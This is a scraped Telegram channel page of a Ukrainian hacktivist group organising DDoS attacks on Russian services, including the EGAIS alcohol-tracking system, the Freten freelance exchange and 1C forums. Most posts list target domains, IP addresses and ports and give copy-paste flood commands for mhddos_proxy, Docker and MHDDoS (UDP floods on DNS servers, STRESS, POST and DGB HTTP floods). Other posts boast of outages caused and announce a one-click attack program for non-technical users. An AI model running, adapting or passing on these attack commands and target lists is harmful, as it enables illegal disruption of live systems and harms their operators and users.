cookie

Utilizamos cookies para mejorar tu experiencia de navegación. Al hacer clic en "Aceptar todo", aceptas el uso de cookies.

avatar

Гайдамаки InfoDDoS-1

Mostrar más
El país no está especificadoEl idioma no está especificadoLa categoría no está especificada
Advertising posts
373Suscriptores
Sin datos24 hours
Sin datos7 days
Sin datos30 days

Carga de datos en curso...

Tasa de crecimiento de suscriptores

Carga de datos en curso...

Доброго дня, Гайдамаки! Ми вирішили, що ці 4 канали не потрібні, тому через кілька днів їх буде видалено..😓 Причина проста: всі цілі і пости просто дублюються сюди, виникає питання — чому б вам не брати таргети на пряму з основного каналу? Ось і ми так подумали, тому всім активним учасникам прошу перейти на основний канал, лінк нижче: https://t.me/haydamaki Люблю, цілую — головний адмін❤️
Mostrar todo...
Гайдамаки

Discord Гайдамак:

https://discord.gg/UyqBRprgZt

Чат Гайдамак:

https://t.me/haydamaki_chat

Документація DDoS:

https://t.me/haydamaki/14

Зв'язок з адмінами: @haydamak_bot

Repost from Гайдамаки
Доброї ночі, Гайдамаки, цей пост буде більш розмовного характеру💡 Сьогодні ми продовжили атаку на ЕГАИС, але поки що можу сказати одне — їх сервери були довго вимкнені і взагалі відгороджені від інтернету, так сказати, "закрились на ремонт", тим часом закрились ще два заводи-пивоварні, так як продукція стоїть на складах, а вивезти її не можуть... Поки що я слідкую за ситуацією там і вже вранці точно зможу сказати, що атакуємо далі, думаю, що б такого цікавого підготувати рашистам на 9 травня😏 А зараз відпочивайте) Також, хочу сказати, що ми готуємо автоматичну програму для запуску кібератак на Windows (це для тих, хто боїться запускати консоль/термінал). Все, що вам буде потрібно зробити, — це запустити ".exe" файл. Все. Атака буде йти. Більш детальнішу інформацію ви отримаєте згодом, але сам факт полягає в тому, що атакувати зможуть навіть люди, які далекі від ІТ і не знають "шо куди жати і шо це за команди якісь на каналі". Навіть ваша бабуся запустить атаку😁 Для тих, хто з комп'ютером взаємодіє частіше — я закінчую працювати над інструкцією ддос "DDoS від А до Я", основний інструмент — це mhddos і його модифікації. Так як це найпотужніший інструмент на даний момент. ЗБІР о 12.00!
Mostrar todo...
Repost from Гайдамаки
​​Доброго дня Гайдамаки! Щодо наших перемог на кібер-фронті. Як і хлопці у ЗСУ, ми не даємо ворожим сис.адмінам навіть спокійно піти подивитись "Zомбо-ящик". Бідолаги змушені вдаватися до крайнощів. Трішки про досягнення: Сервіс Фертен два дні поспіль відчував себе, як я після весілля кума брата моєї сестри. Звісно вони намагалися вчинити певні дії по реабілітації, але, дивлячись на результат, можемо зробити висновок, що "Бетаргін" їм не допоміг. Тому поколошматили ми їх досить сильно. Тим часом, ІТ армія орків сидить на березах, ловлячи останні Мб інтернету, ми знову оголошуємо кіновечір. Так як Доктор Стрендж вже зайняв своє місце у складі Хмельницького ТРО, його на кіно-вечорі сьогодні не буде. Тому пропонуємо вам запастися смаколиками та провести вечір за переглядом фільму "Сноуден" Як і зазвичай, перегляд буде відбуватись у перерві між вибором цілей ЗБІР СЬОГОДНІ 20:30
Mostrar todo...

Приєднатись до перегляду!
Repost from Гайдамаки
Доброго дня, Гайдамаки і Гайдамачки!✨ З вечора і всю ніч ми мучили форум і фріланс біржу спеціалістів з 1С, але тепер настав час переключитись на іншу ціль. Думаю ви вже бачили новини, що в рашистів проблеми з Алкоголем через непрацюючу систему "ЕГАИС". Все просто — це постарались наші колеги по цеху, але вони не атакували DNS сервери. Тому сьогодні допоможемо їм в цьому ділі. egais.ru service.egais.ru check.egais.ru documents-utm.egais.ru 212.164.137.246 [443/TCP] cheques-utm.egais.ru 146.120.90.247 [443/TCP] queries-utm.egais.ru 146.120.90.245 [443/TCP] DNS сервери ЕГАИС: 91.217.20.20 91.217.21.20 89.104.93.31 193.232.146.1 [53/UDP] 194.67.73.79 [53/UDP, 111/UDP] Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table (вище пріорітетна команда для атаки)** docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://egais.ru https://service.egais.ru https://check.egais.ru https://documents-utm.egais.ru https://cheques-utm.egais.ru https://queries-utm.egais.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table (вище пріорітетна команда для атаки)** python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://egais.ru https://service.egais.ru https://check.egais.ru https://documents-utm.egais.ru https://cheques-utm.egais.ru https://queries-utm.egais.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS:
python3 start.py UDP 91.217.20.20:53 5000 10000 true
python3 start.py UDP 91.217.21.20:53 5000 10000 true
python3 start.py UDP 89.104.93.31:53 5000 10000 true
python3 start.py UDP 89.104.93.31:53 5000 10000 true
python3 start.py UDP 193.232.146.1:53 5000 10000 true
python3 start.py UDP 194.67.73.79:53 5000 10000 true
python3 start.py UDP 194.67.73.79:111 5000 10000 true
Нагадую, наша ціль зосередитись поки що саме на UDP таргетах, бажаю всім гарно провести час👌
Mostrar todo...
Доброго вечора, кібервоїни!⚔️ Ми атакували Фретен два дні підряд. Вони сховались за DDoS-Guard захистом. Пробити його нам вдалось, але тільки на кілька годин. Зараз сервіс функціонує нормально, але покошмарили ми їх знатно😈 Як не як, сервери не працювали, і потік грошей було тимчасово зупинено. Останнім часом всі угрупування ddos атакують сервіси 1С, зараз атаку локалізовано на "ЕГАИС". Для вирішення проблем на серверах 1С потрібні спеціалісти, що ж... так як наш вектор атаки це фріланс біржі, зокрема і бізнес сектор рашистів, ми атакуємо фріланс біржу саме спеціалістів для 1С. 1cl.su 1clancer.ru 213.108.130.76 [22/TCP, 80/TCP, 443/TCP-ssl, 3001/TCP] forum-1c.ru lancer.forum-1c.ru 176.113.82.119 —> форум [443/TCP-ssl] Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://1cl.su/ https://1clancer.ru/ https://lancer.forum-1c.ru/ https://forum-1c.ru/ -t 2100 --rpc 2000 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://1cl.su/ https://1clancer.ru/ https://lancer.forum-1c.ru/ https://forum-1c.ru/ -t 2100 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS: python3 start.py STRESS https://1cl.su/ 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://1clancer.ru/ 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://lancer.forum-1c.ru/ 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://forum-1c.ru/ 6 1000 proxy.txt 10000 5000 true DNS сервери висять на Яндекс клауді, а поштові захищені, тому їх не атакуємо. Ціль — сам сайт👍
Mostrar todo...

GitHub is where people build software. More than 73 million people use GitHub to discover, fork, and contribute to over 200 million projects.

Друзі до вас таке питання: хто атакує, хто ні, а хто бере цілі з основного каналу? (потрібно вирахувати актив з цього каналу)Anonymous voting
  • Я атакую, але беру цілі з основного каналу Гайдамак, цей канал не потрібний
  • Я не атакую
  • Я атакую, але беру цілі з інших ддос-каналів
  • Я атакую і цей канал мені потрібний зі стабільним активом
0 votes
Доброго вечора, Гайдамаки! Продовжуємо атакувати Фретен біржу. Сервіс працює, але з перебоями. Іноді буває, що ддос гуард вічно грузиться, але ніяк не прогрузиться, іноді сайт з'являється, але без CSS... Коротко кажучи, ми молодці, атаку не зупиняємо, результати дуже хороші😁 Також зараз не рекомендую ігнорувати тривоги, кацапи бушують...😓 І не розповсюджуйте інформацію "шо де в кого бахнуло", я звертаюся до всіх вас, так як ви перебуваєте в багатьох чатах, і навіювати паніку не потрібно.
Mostrar todo...
Доброго вечора, Гайдамаки! До цього моменту ми успішно атакували нашу ціль, але зараз кацапи сховались за DDoS-Guard захистом, також змінили поштовий айпі. Але не страшно, це нам не заважає бити їх далі, але вже методом DGB (буде дуже важко), а для пошти зміним айпі в таргетах. Все з українською любовю😘 Фретен, готуйтесь, буде жарко! Це вам за обстріляні наші міста, сьогодні🤬 (друзі, не ігноруйте тривоги) freten.ru robroy.ru mail.freten.ru mail.robroy.ru [ddos-guard] —> сайт* 82.202.172.70 [21/TCP, 22/TCP, 25/smtp, 110/pop3, 143/imap, 465/ssl/smtp, 587/smtp, 993/ssl/imap, 995/ssl/pop3, 1500/TCP] [53/UDP, 123/UDP] 82.146.43.2 94.250.248.160 [53/UDP] —> DNS-servers* Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://freten.ru https://robroy.ru -t 2200 --rpc 2000 -p 900 --http-methods DGB --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://freten.ru https://robroy.ru -t 2200 --rpc 2000 -p 900 --http-methods DGB --table Команди для MHDDoS: python3 start.py UDP 82.202.172.70:53 5000 10000 true python3 start.py UDP 94.250.248.160:53 5000 10000 true python3 start.py UDP 82.146.43.2:53 5000 10000 true python3 start.py UDP 82.202.172.70:123 5000 10000 true (тут синхронізація часу(123 порт), тому не пріорітетна команда)* python3 start.py DGB https://freten.ru 6 1000 proxy.txt 10000 5000 true python3 start.py DGB https://robroy.ru 6 1000 proxy.txt 10000 5000 true Спробуємо пробити захист - нам потрібно, щоб сервіс лежав, сил багато для цього потрібно, бо бити такі барєри було завжди не легкою задачою, тим більше ми вперше атакуємо таким способом.
Mostrar todo...

GitHub is where people build software. More than 73 million people use GitHub to discover, fork, and contribute to over 200 million projects.

Без коментарів.... Перша біржа вже лежить, тримаємо в такому прекрасному стані її далі, потім атака на іншу😉👌
Mostrar todo...
Repost from Гайдамаки
Знову всіх вітаю, сподіваюсь, ви готові?😏 Атакуємо російську фріланс біржу Фретен — не найпопулярніший сервіс, але через нього теж багато людей працюють, і потік грошей там великий. Такі сервіси, зазвичай, платять налоги в держ. казну РФ, а значить фінансово підтримують ворога. Думаю більше розповідати тут нічого. ЧАВИМО РАШИСТІВ🤬 freten.ru robroy.ru 37.46.131.229 [21/TCP, 22/TCP, 443/TCP, 1500/TCP] —> сайт* [53/UDP, 123/UDP] mail.freten.ru mail.robroy.ru 37.46.131.229 [25/smtp, 110/pop3, 143/imap, 465/ssl/smtp, 587/smtp, 993/ssl/imap, 995/ssl/pop3] —> пошта* 82.146.43.2 94.250.248.160 [53/UDP] —> DNS-servers* Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS:
python3 start.py UDP 37.46.131.229:53 5000 10000 true
python3 start.py UDP 94.250.248.160:53 5000 10000 true
python3 start.py UDP 82.146.43.2:53 5000 10000 true

python3 start.py UDP 37.46.131.229:123 5000 10000 true
(тут синхронізація часу(123 порт), тому не пріорітетна команда)* python3 start.py STRESS https://freten.ru 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://robroy.ru 6 1000 proxy.txt 10000 5000 true python3 start.py POST https://mail.freten.ru 6 1000 proxy.txt 10000 5000 true python3 start.py POST https://mail.robroy.ru 6 1000 proxy.txt 10000 5000 true
Mostrar todo...